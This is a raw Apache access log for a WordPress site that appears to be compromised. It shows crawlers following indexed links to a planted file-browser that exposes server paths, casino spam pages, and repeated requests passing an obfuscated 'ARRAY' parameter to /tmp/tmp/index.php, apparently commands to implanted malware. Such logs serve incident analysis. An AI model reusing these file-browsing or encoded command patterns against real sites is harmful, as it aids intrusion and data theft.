54.84.250.51 - - [01/Nov/2025:09:13:31 -0400] "GET /portfolio-commercial?path=//usr/lib/firmware/nvidia/tu102 HTTP/1.1" 200 3512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:09:13:32 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/ajaxchat/images HTTP/1.1" 200 2897 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:09:13:33 -0400] "GET /m295045643?fileloc=/home/creaqbdc/public_html/wp-includes/rss.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 9520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.232.11.247 - - [01/Nov/2025:09:13:35 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?fileloc=//proc/thread-self/root/bin/mariadb-secure-installation&path=//proc/thread-self/root/bin HTTP/1.1" 200 8524 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
47.128.125.23 - - [01/Nov/2025:09:13:37 -0400] "GET /portfolio/?fileloc=%2Fhome%2Fcreaqbdc%2Fpublic_html%2Fwp-config.php&path=%2Fhome%2Fcreaqbdc%2Fpublic_html HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
74.7.227.59 - - [01/Nov/2025:09:13:38 -0400] "GET /m110026674?fileloc=/home/creaqbdc/public_html/wp-includes/class-smtp.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 2679 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.188.200.18 - - [01/Nov/2025:09:08:39 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030363131392p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030323531392q3232663866626332373033643566656563383361653061633235376337393536222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
184.73.167.217 - - [01/Nov/2025:09:13:39 -0400] "GET /probability-of-winning-calculator-chance-probability-calculator/?path=//opt/cpanel/ea-libxml2/lib HTTP/1.1" 200 3333 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
69.197.179.242 - - [01/Nov/2025:09:13:38 -0400] "GET /wp-content/x072d63/index.php?id=893896 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-content/x072d63/index.php?id=893896" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.65.197 - - [01/Nov/2025:09:13:41 -0400] "GET /m294035514?srsltid=AfmBOoqweyjzbxbH0b4WuS_RByQ56wfu3_0NIZqJPs-V-dxSeUbTan HTTP/1.1" 200 19646 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:09:13:41 -0400] "GET /q-~226Z7TBqAgb2Eq5m7xrl0WxmuEdAWKRGA39805/ HTTP/1.1" 200 20100 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.65.197 - - [01/Nov/2025:09:13:41 -0400] "GET /m041041285?srsltid=AfmBOoIESIaROVvDNUZmF1_LxRea9vgFf_GapJWnkE-V-T3k5Kbyzb HTTP/1.1" 200 20119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:09:13:42 -0400] "GET /m096007484?path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 11487 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
35.174.141.243 - - [01/Nov/2025:09:13:43 -0400] "GET /beste-versorger-provision/?fileloc=//opt/cloudlinux/venv/lib64/python3.11/site-packages/pluggy-1.2.0.dist-info/METADATA&path=//opt/cloudlinux/venv/lib64/python3.11/site-packages/pluggy-1.2.0.dist-info HTTP/1.1" 200 4677 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:09:13:44 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/suitecrm HTTP/1.1" 200 3756 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:09:13:46 -0400] "GET /m214029988?fileloc=/home/creaqbdc/public_html/wp-includes/vars.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 4464 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:09:13:47 -0400] "GET /m091002225?srsltid=AfmBOokmoVwcYVUA63NyU3_iZFxigBisw_tiXk5mkK-O-GlT4lNjyP HTTP/1.1" 200 4159 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
107.20.224.184 - - [01/Nov/2025:09:13:47 -0400] "GET /a-wild-ride-through-digital-dimensions-in-turbo/?path=//home/creaqbdc/public_html/wp-includes/style-engine HTTP/1.1" 200 3650 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:09:13:47 -0400] "GET /autoparts-agency02-505658480 HTTP/1.1" 200 4132 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.59 - - [01/Nov/2025:09:13:51 -0400] "GET /m047030649?fileloc=/home/creaqbdc/public_html/wp-includes/ms-settings.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 4030 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.235.172.108 - - [01/Nov/2025:09:13:52 -0400] "GET /services/renovation-contractor/?path=//var/tmp/mbdvd0 HTTP/1.1" 200 3759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.198 - - [01/Nov/2025:09:13:53 -0400] "GET /casino-locations-australia/ HTTP/1.1" 200 19594 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:09:13:53 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/wallabag HTTP/1.1" 200 3657 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.198 - - [01/Nov/2025:09:13:53 -0400] "GET /q-~196l6AdDoMTKdvho6iBf7hAkFQ5ZnQpWA15981/ HTTP/1.1" 200 4149 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.179.242 - - [01/Nov/2025:09:13:54 -0400] "GET /wp-includes/plf56b4b/edit.php?id=836336 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-includes/plf56b4b/edit.php?id=836336" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
52.3.102.51 - - [01/Nov/2025:09:13:55 -0400] "GET /verkettete-liste-inside-5-linien-gemeinsam/?path=//lib64/perl5/vendor_perl/auto/IPC HTTP/1.1" 200 3354 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:09:13:56 -0400] "GET /m067012561?path=/home/creaqbdc/public_html/wp-includes/interactivity-api HTTP/1.1" 200 2882 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:09:13:58 -0400] "GET /m041038021?srsltid=AfmBOotmcVHOIJoWw5eP0G_HB0NlUgNBU_ACauPhaA-K-enVkeyVPv HTTP/1.1" 200 19032 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.188.200.18 - - [01/Nov/2025:09:08:59 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030363133392p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030323533392q6666653234376664353739663438306538383264613533323638366132316265222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
66.249.65.197 - - [01/Nov/2025:09:13:59 -0400] "GET /q-~164xEVIT7dwpYEk9ogWY2EFqWubLJmyhK5987/ HTTP/1.1" 200 4152 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.59 - - [01/Nov/2025:09:14:00 -0400] "GET /m110026674?fileloc=/home/creaqbdc/public_html/wp-includes/class-wp-hook.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 6418 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.156.55.147 - - [01/Nov/2025:09:14:00 -0400] "GET /beste-versorger-provision/?path=//opt/alt/alt-nodejs19/root/usr/share/locale/smj HTTP/1.1" 200 3396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:09:14:02 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/akaunting/images HTTP/1.1" 200 2909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:09:14:03 -0400] "GET /q-~131dSWxSJnzls8zqtVdGVZswc8fSr011h15718/ HTTP/1.1" 200 18982 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.231.156.59 - - [01/Nov/2025:09:14:03 -0400] "GET /das-beste-world-wide-web-spielbank-via-herumtoben-vortragen/?fileloc=//usr/bin/mariadb-tzinfo-to-sql&path=//usr/bin HTTP/1.1" 200 2952 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:09:14:04 -0400] "GET /m214029988?fileloc=/home/creaqbdc/public_html/wp-includes/class-wp-role.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 3213 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.7.13.143 - - [01/Nov/2025:09:14:08 -0400] "GET /a-cosmic-journey-through-the-realm-of-space-xy/?path=//home/creaqbdc/public_html/wp-includes/assets HTTP/1.1" 200 3783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:09:14:08 -0400] "GET /q-~149Zm4hbeovMsOHGIwZavu9Xr5kToLwjQ47076/ HTTP/1.1" 200 4130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.65.197 - - [01/Nov/2025:09:14:08 -0400] "GET /m256011492?srsltid=AfmBOoXYlMfJeNqSeL1HJv_8ZBFl9r1Ud_Ji5bMASu-C-snUmNcBNV HTTP/1.1" 200 20524 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:09:14:10 -0400] "GET /m096007484?fileloc=/home/creaqbdc/public_html/wp-includes/widgets.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 18947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.218.170.184 - - [01/Nov/2025:09:14:11 -0400] "GET /a-cosmic-journey-through-the-realm-of-space-xy/?path=//lib/python3.6/site-packages/dns HTTP/1.1" 200 5227 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:09:14:12 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/freshrss HTTP/1.1" 200 3724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:09:14:14 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~154qyhM8i8FHlIT9gtUwSKf4lLDoPzKeX22073/ HTTP/1.1" 200 18746 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:09:14:14 -0400] "GET /q-~11jRU0kETlhXL4p6X0lgMZCzSWgsMA1Q48988/ HTTP/1.1" 200 19419 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:09:14:15 -0400] "GET /q-~178k8TOLFBw8Bha6sIvu9JPM8VJWoxdia5717/ HTTP/1.1" 200 18974 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:09:14:15 -0400] "GET /m096007484?fileloc=/home/creaqbdc/public_html/wp-includes/class-wp-token-map.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 10822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.92.171.106 - - [01/Nov/2025:09:14:15 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?path=//home/creaqbdc/public_html/wp-includes/sodium_compat/src/Core32/ChaCha20 HTTP/1.1" 200 3503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
199.188.200.18 - - [01/Nov/2025:09:09:19 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030363135392p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030323535392q6263306165356163346638666264363738333665373939383761643464393166222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
74.7.227.59 - - [01/Nov/2025:09:14:18 -0400] "GET /m214029988?fileloc=/home/creaqbdc/public_html/wp-includes/class-wp-plugin-dependencies.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 7882 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:09:14:20 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~193l0XAnGhIinFiDrGUKcy81AlS5u24yz41060/ HTTP/1.1" 200 18745 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
100.28.133.214 - - [01/Nov/2025:09:14:19 -0400] "GET /main/?path=//usr/share/zoneinfo/right/Europe HTTP/1.1" 200 6165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:09:14:20 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/flatboard HTTP/1.1" 200 3466 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:09:14:21 -0400] "GET /q-~15O4uhSbjpb2g0hsyLyoNiU6m63pG5PN47018/ HTTP/1.1" 200 20354 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:09:14:22 -0400] "GET /m016024494?path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 11487 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.208.156.9 - - [01/Nov/2025:09:14:23 -0400] "GET /a-cosmic-journey-through-the-realm-of-space-xy/?path=//opt/cloudlinux/alt-php83/root/usr/share/doc HTTP/1.1" 200 3507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:09:14:26 -0400] "GET /m029037101?path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 11498 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.225.9.97 - - [01/Nov/2025:09:14:28 -0400] "GET /portfolio-residential/?path=//lib/locale/en_IE@euro/LC_MESSAGES HTTP/1.1" 200 3357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:09:14:28 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/churchcrm HTTP/1.1" 200 3489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:09:14:30 -0400] "GET /m269014613?path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 11498 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:09:14:31 -0400] "GET /minimum-deposit-casino-canada/ HTTP/1.1" 200 19111 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.1.157.90 - - [01/Nov/2025:09:14:31 -0400] "GET /bathrooms/?fileloc=//bin/yes&path=//bin HTTP/1.1" 200 2926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:09:14:34 -0400] "GET /m022042156?path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 11498 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.238.45.183 - - [01/Nov/2025:09:14:35 -0400] "GET /spielbank-pramie-ohne-einzahlung-beste-no-vorleistung-boni-2025/?fileloc=//proc/thread-self/root/bin/mysqldump&path=//proc/thread-self/root/bin HTTP/1.1" 200 2978 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:09:14:36 -0400] "GET /q-~179fYJpVSOrrTwVbPhdSQ2RGjYe6w8YGz4178/ HTTP/1.1" 200 19694 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:09:14:38 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/litforum HTTP/1.1" 200 3514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.188.200.18 - - [01/Nov/2025:09:09:40 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030363138302p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030323538302q3865316232303335306437373964316561366264623135636531393034653539222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
74.7.227.59 - - [01/Nov/2025:09:14:39 -0400] "GET /m199026165?path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 11514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.90.8.255 - - [01/Nov/2025:09:14:40 -0400] "GET /greatest-crypto-playing-websites-in-the-2025-vital-link-ranked-reviewed/?path=//usr/lib/.build-id/c1 HTTP/1.1" 200 4802 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:09:14:42 -0400] "GET /q-~49kjnzU3glWr6PmN6ATnaLu7kV86uLkO28016/ HTTP/1.1" 200 20111 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:09:14:43 -0400] "GET /m063006279?path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 11498 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.215.49.176 - - [01/Nov/2025:09:14:44 -0400] "GET /a-wild-ride-through-digital-dimensions-in-turbo/?path=//opt/alt/alt-nodejs9/root/usr HTTP/1.1" 200 3781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:09:14:46 -0400] "GET /q-~268H5VO0ULRdXw1kw5XkuTEooGwOaYftp38247/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.65.197 - - [01/Nov/2025:09:14:47 -0400] "GET /q-~96ZifSX1yAizJyQs07KlheKrjZgRaz7J13553/ HTTP/1.1" 200 19697 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:09:14:48 -0400] "GET /robots.txt HTTP/1.1" 200 109 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:09:14:47 -0400] "GET /m016024494?fileloc=/home/creaqbdc/public_html/wp-includes/block-editor.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 9325 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:09:14:47 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/dolibarr HTTP/1.1" 200 3652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
35.171.117.160 - - [01/Nov/2025:09:14:48 -0400] "GET /probability-of-winning-calculator-chance-probability-calculator/?path=//opt/cloudlinux/alt-php70/root HTTP/1.1" 200 3481 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:09:14:48 -0400] "GET /doc/first_timer_badge.png?path=%2F%2Fvar%2Fsoftaculous%2Focart2%2Fphp53 HTTP/1.1" 200 2936 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
